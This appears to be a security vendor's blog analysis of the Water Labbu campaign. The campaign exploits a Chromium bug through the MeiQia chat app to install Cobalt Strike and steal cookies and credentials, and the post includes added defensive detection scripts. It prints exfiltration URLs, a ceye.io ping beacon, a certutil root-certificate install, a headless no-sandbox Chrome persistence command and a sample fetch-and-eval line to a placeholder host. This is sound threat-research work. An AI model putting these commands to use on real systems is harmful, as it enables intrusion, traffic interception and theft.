We found that the Cobalt Strike instance added a persistence registry key to load an exploit file from an online code repository managed by Water Labbu. The repository hosted a number of exploit files for CVE-2021-21220 (a Chromium V8 vulnerability affecting versions earlier than 89.0.4389.128) that execute a Cobalt Strike stager. It also contained files designed to target Meiqia (美洽), a Chinese desktop-based live chat app for online customer support that is used on websites. MeiQia (美洽) was developed using ElectronJS, a framework that bundles the Chromium core and is therefore exposed to Chromium's vulnerabilities.
We observed that many of the cryptocurrency scam websites compromised in this campaign also embedded Meiqia to give potential victims an easy way to communicate with the site operators. This association suggests that Water Labbu likely delivers the exploit through the live chat box. Supporting this, we found an exploit HTML file sample containing a screenshot that looks like a withdrawal confirmation for cryptocurrency funds. If scammers open the exploit page in an old, vulnerable version of the Meiqia management client application, they can be infected by Water Labbu.
The infection is initiated when the initial scammer (in essence, the victim) opens a weaponized web page (likely sent to them via live chat). A recent research paper on Electron security demonstrated successful exploitation of an Electron-based application using CVE-2021-21220. In that scenario, the authors used cross-site scripting (XSS) techniques to force the exploit to be rendered in a window without sandboxing.
We found weaponized HTML pages created by Water Labbu that leverage the same Chromium vulnerability to attack the MeiQia application. The initial scammers used an old version of MeiQia, which may be vulnerable to the exploit. Review of the code shows that old versions of MeiQia open external links inside the ElectronJS application and render the web page without sandboxing. The latest version of MeiQia is not vulnerable because it runs on a newer Chromium core and opens external links in the default system web browser rather than inside the ElectronJS app.
The weaponized HTML pages contain JavaScript that uses the User-Agent to determine whether the victim's environment is vulnerable. The script looks for the strings "electron" and "x64" to identify Electron-based applications on x64 architecture. It also looks for the strings "0.0.8 Chrome/83," "s/0.0.7," or "s/0.0.6," to determine whether it is running inside a vulnerable version of Chromium or of the MeiQia application. If the User-Agent does not match, the page either redirects the visitor to the official MeiQia website or creates a new iframe that loads screenshots of banking or cryptocurrency transactions. These are likely the lures Water Labbu used when communicating with the targeted cryptocurrency scam websites.
When a weaponized HTML page detects a vulnerable target, it proceeds to load additional stages of the attack.
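The User-Agent gate described above, reconstructed as an added example (this is not code from the page or from Water Labbu). The marker strings are the ones quoted above; the "meiqia-windows" product token in the sample User-Agents and the generalised check, which treats any Electron build whose embedded Chromium predates the 89.0.4389.128 fix as exposed, are assumptions for illustration. A defender can run their own application's User-Agent through it to see whether it would have been targeted.

```javascript
// Added example (not code from the page or from Water Labbu): a reconstruction of
// the User-Agent gate described above. The marker strings are the ones the page
// quotes; the "meiqia-windows" product token in the sample UAs and the generalised
// "any Electron build older than the fix" check are assumptions for illustration.

const FIXED_CHROMIUM = [89, 0, 4389, 128]; // first Chrome build carrying the CVE-2021-21220 fix

// Markers the weaponized page looks for, as quoted on the page.
const MEIQIA_MARKERS = ['0.0.8 Chrome/83', 's/0.0.7', 's/0.0.6'];

// Pull "Chrome/89.0.4389.114" out of a UA string as a numeric tuple, or null.
function chromiumVersion(ua) {
  const m = /\bChrome\/(\d+)\.(\d+)\.(\d+)\.(\d+)/.exec(ua);
  return m ? m.slice(1, 5).map(Number) : null;
}

// Lexicographic comparison of two 4-part version tuples (negative if a < b).
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// Mirrors the attacker's string checks: Electron + x64 plus one version marker.
function matchesWaterLabbuGate(ua) {
  const lower = ua.toLowerCase();
  const electronX64 = lower.includes('electron') && lower.includes('x64');
  return electronX64 && MEIQIA_MARKERS.some((marker) => ua.includes(marker));
}

// Generalisation (an assumption, not the attacker's logic): any Electron app whose
// embedded Chromium predates the fix is exposed to the same V8 bug.
function classify(ua) {
  if (matchesWaterLabbuGate(ua)) return 'exploit';
  const v = chromiumVersion(ua);
  if (/\bElectron\//.test(ua) && v && compareVersions(v, FIXED_CHROMIUM) < 0) {
    return 'exploit-generalised';
  }
  return 'lure-or-redirect'; // non-matching UAs get the redirect or the iframe lure
}

// Constructed sample UAs; "meiqia-windows" is a hypothetical product token.
const SAMPLE_UAS = {
  oldMeiQia: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) meiqia-windows/0.0.8 Chrome/83.0.4103.122 Electron/9.4.4 Safari/537.36',
  newMeiQia: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) meiqia-windows/1.2.0 Chrome/100.0.4896.160 Electron/18.3.5 Safari/537.36',
  otherOldElectron: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) some-app/2.0.0 Chrome/87.0.4280.141 Electron/11.2.3 Safari/537.36',
  desktopChrome: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
};

for (const [name, ua] of Object.entries(SAMPLE_UAS)) {
  console.log(name.padEnd(18), classify(ua));
}
```

The third sample shows why the version comparison matters: it is an Electron build the attacker's literal string checks would not catch, yet its Chromium 87 core carries the same unpatched V8 bug.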
The final stage involves the creation and loading of a new script called "tongji.js," which in Chinese means 痛擊 (to deliver a punishing attack). These files are hosted in Water Labbu's code repository. The "tongji.js" script is JavaScript containing CVE-2021-21220 exploit code, with a shellcode that is a Cobalt Strike stager. The Metasploit module for this vulnerability is publicly available. Water Labbu reuses the available code and wraps it in several layers of obfuscation (sojson.v4, jsjiami.com.v5) before executing the custom shellcode.
The embedded shellcode can be either a Cobalt Strike stager or a complex batch command capable of stealing credentials and of downloading and running other scripts and files.
Regardless of whether the embedded shellcode is the stager or the custom batch script, we noticed that the set of malicious operations performed was largely the same:
1) Download and install Cobalt Strike
2) Steal cookies and other important files
3) Download and patch the MeiQia app
4) Download additional spying software
5) Report the infection progress to the report-collecting server, among others
The Cobalt Strike stager is usually encrypted (XOR, AES), encoded (Base64, hexadecimal), and embedded into a Golang shellcode runner to make payload detection harder. The malware operator was likely inspired by this blog post.
It attempts to steal *.txt files in "Desktop" and "Telegram Desktop," and MeiQia cookies in "AppData\Roaming\com.meiqia.windows\cookies." These files are embedded in a specially crafted .html file and submitted to the information-collecting server with the help of headless Chrome (without a visible UI) or Internet Explorer (if submission with Chrome fails). The crafted .html file contains one form, one text input holding the computer name, and one text area holding the stolen content. After a timeout expires, the script automatically submits the form to a typosquatting domain.
If Cobalt Strike has not been installed yet, it is downloaded and executed. The Golang shellcode runner is used as a form of obfuscation.
To learn whether the infection succeeded or failed, parameters such as COMPUTERNAME and USERNAME are exfiltrated to the report-collecting server. In case of failure, the script may send the following requests:
- https://<report collecting server>/?a=%COMPUTERNAME%&f=0&user=%USERNAME%
- https://<report collecting server>/?b=%COMPUTERNAME%&f=0&user=%USERNAME%
- https://<report collecting server>/?z=%COMPUTERNAME%user=%USERNAME%_fail
If the MeiQia app is not found, the error report with parameter "a" is sent. If the app is found but is unpatched, the error report with parameter "b" is sent. If the discretionary access control list change made with icacls fails, the error report with parameter "z" is sent.
Meanwhile, another script checks whether the process "360tray," belonging to the 360 Total Security solution, is running:
- https://<report collecting server>/c/?c=%computername%
- https://<report collecting server>/c/?c=%computername%_no360
In some cases, we also observed DNS and HTTP monitoring platforms such as ceye.io being used to collect information about the infection progress:
- ping %computername%.<unique identifier>.ceye.io
(Figure: the batch script for downloading and installing MeiQia and Chrome)
If necessary, this batch script downloads a vulnerable version of Chrome (89.0.4389.114) and/or an already-patched MeiQia application from a repository hosted on a popular version control website. These files are downloaded and extracted onto the infected system.
The script modifies the Run registry key for persistence, with the persistent command being "chrome.exe --headless --no-sandbox --user-data-dir=<path to user data dir> <path to CVE-2021-21220 exploit>". Because the script installed a vulnerable version of Chrome, the next logon (for example, after a reboot) triggers exploitation of the vulnerability and execution of the embedded shellcode (either Cobalt Strike or a custom one).
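A hunt for this persistence technique, as an added example that is not code from the page: it parses the text output of `reg query` for the HKCU Run key and flags values that launch Chrome headless, without its sandbox, against a local HTML page. The sample registry output, the value names and the file paths are constructed for illustration; in practice you would feed it the real `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` output (and the HKLM equivalent) collected from the host.

```javascript
// Added example (not code from the page): hunt for the headless-Chrome Run-key
// persistence described above, over constructed `reg query ...\Run` output.
// Value names, paths and the chrome.exe location are assumptions for illustration.

// Constructed output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
// String.raw keeps the Windows backslashes intact.
const SAMPLE_REG_QUERY = String.raw`
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    ChromeUpdate    REG_SZ    C:\Users\Bob\AppData\Local\Chrome\Application\chrome.exe --headless --no-sandbox --user-data-dir=C:\Users\Bob\AppData\Local\cud C:\Users\Bob\AppData\Local\tongji\index.html
    Chrome    REG_SZ    "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window
`;

// Parse the indented "Name    REG_TYPE    data" rows into objects; key header
// lines are not indented and are skipped.
function parseRegQuery(text) {
  const rows = [];
  for (const line of text.split(/\r?\n/)) {
    const m = /^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*\S)\s*$/.exec(line);
    if (m) rows.push({ name: m[1], type: m[2], data: m[3] });
  }
  return rows;
}

// Flag Run entries that launch chrome.exe headless against a local page without
// the sandbox: the exact combination the page describes as the persistence
// trigger that re-fires the CVE-2021-21220 exploit at every logon.
function findHeadlessChromePersistence(text) {
  const findings = [];
  for (const row of parseRegQuery(text)) {
    const cmd = row.data;
    if (!/chrome\.exe/i.test(cmd)) continue;
    const headless = /(^|\s)--headless(=\w+)?(\s|$)/.test(cmd);
    const noSandbox = /(^|\s)--no-sandbox(\s|$)/.test(cmd);
    const localHtml = /(^|\s)\S+\.html?(\s|$)/i.test(cmd);
    const customProfile = /(^|\s)--user-data-dir=/.test(cmd);
    if (headless && (noSandbox || localHtml)) {
      const reasons = ['--headless'];
      if (noSandbox) reasons.push('--no-sandbox');
      if (localHtml) reasons.push('local HTML page as argument');
      if (customProfile) reasons.push('custom --user-data-dir');
      findings.push({ name: row.name, command: cmd, reasons });
    }
  }
  return findings;
}

for (const f of findHeadlessChromePersistence(SAMPLE_REG_QUERY)) {
  console.log(`Run value "${f.name}": ${f.reasons.join(', ')}`);
}
```

The ordinary Chrome entry with `--no-startup-window` is deliberately left unflagged: headless mode on its own is used by legitimate automation, so the rule requires it to be combined with the sandbox being disabled or a local page being loaded.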
This script adds a certificate to the Trusted Root store via the certutil utility:
- certutil -addstore -f root "%userprofile%\<path to certificate>.pem"
The script installs a certificate with the filename "mitmproxy-ca-cert.pem" into Trusted Root. Although we do not have the certificate file, it was likely generated by the mitmproxy tool, given its file name.
It then sets the AutoConfigURL value under "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings". This value points the browser at a proxy auto-configuration (PAC) script, which can route traffic for selected domains through a proxy while everything else goes direct. Combined with the malicious certificate in the Trusted Root store, the attacker can intercept and decrypt HTTPS traffic to those domains and steal entered credentials.
The additional scripts perform the following:
a) Hiding windows with the title "windows update"
b) Downloading and running osmonitor, a tool for spying on victims and monitoring their behavior
c) Patching the MeiQia app, either by downloading an already-patched app0.2.asar archive and replacing the original, or by running a patcher script
d) Restarting the MeiQia app to start the patched version
e) Stealing *.txt and *.xl* files from "Recent Files" and *.lnk, *.txt and *.xl* files from "Desktop," adding a list of running processes and a list of active network connections, then packing these into a zip archive and uploading it to an information-collecting server
The process of patching MeiQia involves altering files in the app.asar archive. In our scenario, the ".\modules\create-window.js" file from the app.asar archive was modified. The modifications included:
a) Disabling auto updates
b) Setting fixed window sizes
c) Replacing the default URL (https://app.meiqia.com) with a malicious one
d) Embedding additional JavaScript files to be executed within the MeiQia application context
When victims open a new MeiQia window, the script injected into the internal "new-window" function checks the title of the web page. If the title does not contain the string "美洽" (MeiQia), it redirects victims to the official MeiQia website and executes additional JavaScript files within the page.
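A static check for the modifications listed above, as an added example that is not code from the page or from MeiQia: given the source of an extracted `create-window.js` (for instance after `npx @electron/asar extract app.asar out`), it reports a replaced default URL, URLs pointing outside the vendor domain, a disabled renderer sandbox, enabled Node integration, a fixed window size, remote script execution and a commented-out update check. Both sample sources are constructed, "attacker.example" is a placeholder host, and the regexes are heuristics for how these changes typically appear in Electron code rather than a description of MeiQia's real file.

```javascript
// Added example (not code from the page or from MeiQia): audit an extracted
// create-window.js for the modifications the page lists. Sample sources are
// constructed, "attacker.example" is a placeholder, and the checks are heuristics.

const ALLOWED_HOSTS = ['meiqia.com']; // the vendor domain and its subdomains

function hostAllowed(hostname) {
  return ALLOWED_HOSTS.some((d) => hostname === d || hostname.endsWith('.' + d));
}

// True if the URL is unparsable or points outside the allowed domains.
function isForeign(url) {
  try { return !hostAllowed(new URL(url).hostname); } catch (e) { return true; }
}

// Every http(s) URL in the source that does not belong to the vendor.
function foreignUrls(src) {
  return (src.match(/https?:\/\/[^\s'"`)]+/g) || []).filter(isForeign);
}

// Is autoUpdater.checkForUpdates() still called on a non-comment line?
function autoUpdateCallPresent(src) {
  return src.split('\n').some((l) => !l.trim().startsWith('//') && /checkForUpdates\s*\(/.test(l));
}

function auditCreateWindow(src) {
  const m = /\bAPP_URL\s*=\s*['"]([^'"]+)['"]/.exec(src);
  const appUrl = m ? m[1] : null;
  return {
    appUrl,
    appUrlForeign: appUrl !== null && isForeign(appUrl),
    foreignUrls: foreignUrls(src),
    sandboxDisabled: /\bsandbox\s*:\s*false\b/.test(src),
    nodeIntegration: /\bnodeIntegration\s*:\s*true\b/.test(src),
    fixedWindowSize: /\bresizable\s*:\s*false\b/.test(src),
    remoteScriptExecution: /\bexecuteJavaScript\s*\(/.test(src),
    autoUpdateDisabled: !autoUpdateCallPresent(src),
  };
}

// Names of the checks that fired.
function findingsOf(report) {
  return Object.entries(report)
    .filter(([, v]) => v === true || (Array.isArray(v) && v.length > 0))
    .map(([k]) => k);
}

// Constructed "patched" module showing each modification the page describes.
const PATCHED_SRC = `
const { BrowserWindow, autoUpdater } = require('electron');
const APP_URL = 'https://attacker.example/app';   // was https://app.meiqia.com
// autoUpdater.checkForUpdates();
function createWindow(url) {
  const win = new BrowserWindow({ width: 1200, height: 800, resizable: false,
    webPreferences: { sandbox: false, nodeIntegration: true } });
  win.loadURL(url || APP_URL);
  win.webContents.on('did-finish-load', () => {
    win.webContents.executeJavaScript('fetch("https://attacker.example/apo.js").then(r => r.text()).then(eval)');
  });
  return win;
}
`;

// Constructed clean module for comparison.
const CLEAN_SRC = `
const { BrowserWindow, autoUpdater } = require('electron');
const APP_URL = 'https://app.meiqia.com';
autoUpdater.checkForUpdates();
function createWindow(url) {
  const win = new BrowserWindow({ width: 1200, height: 800, webPreferences: { sandbox: true } });
  win.loadURL(url || APP_URL);
  return win;
}
`;

console.log('patched:', findingsOf(auditCreateWindow(PATCHED_SRC)));
console.log('clean:  ', findingsOf(auditCreateWindow(CLEAN_SRC)));
```

Comparing the extracted file against a known-good copy of the same app version (a plain `diff`) is more reliable than any heuristic; this audit is for the case where no pristine copy is at hand.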
During our research, we discovered that many of the links used to load additional scripts were no longer active. However, one of the links, which loads a script called "apo.js" (阿婆 = mother-in-law) from their code repository, was still accessible.
If the title contains the Chinese string "登录" (dēng lù = login), the script tries to grab the values of the DOM elements with the IDs "email" and "password" and sends the grabbed data to the remote server "app[.]meiqiacontents[.]com". If the title contains the Chinese character "美" (Mei), it collects the website's cookies and sends them to the same remote server.
When victims open a new window without specifying a URL to load, the new window loads the application's default URL (APP_URL), which has also been replaced with a malicious URL hosted on the delivery server "mmmm[.]whg7[.]cc". The delivery server only responds when the User-Agent contains the string "Electron," to ensure that the request was sent from an Electron application.
The request to the malicious URL receives code that redirects to the MeiQia app's original default URL. At the same time, it creates a small new window to load another URL that performs several redirections before finally attempting to exploit CVE-2021-21220 and launch a Cobalt Strike stager.
Water Labbu registered the typosquatting domain name meiqla.com (compared to the legitimate meiqia.com). Although the website looks visually identical to the legitimate one, it has one noteworthy malicious feature.
Figure 14 shows how the function lc() reads the user-entered email and password and exfiltrates them to a data-recording PHP script before redirecting victims to the legitimate meiqia.com website.
Water Labbu is a dangerous new threat actor with a complex routine and infrastructure that is not afraid to leverage other scammers' schemes for its own ends, exploiting live chat applications built on the ElectronJS framework that are embedded in preexisting scam websites.
A key part of the threat actor's routine is the exploitation of a known Chromium vulnerability to target scammers who use an unpatched version of the MeiQia app. Given that users are dealing not only with the original scammer but with Water Labbu as well, we advise both individuals and organizations to update their applications and systems to the latest secure versions to prevent vulnerable software from being exploited and used in malicious ways.
Read the first part of our Water Labbu series to learn more about how the threat actor compromises DApps for its own purposes.
The indicators of compromise for this blog entry can be found here.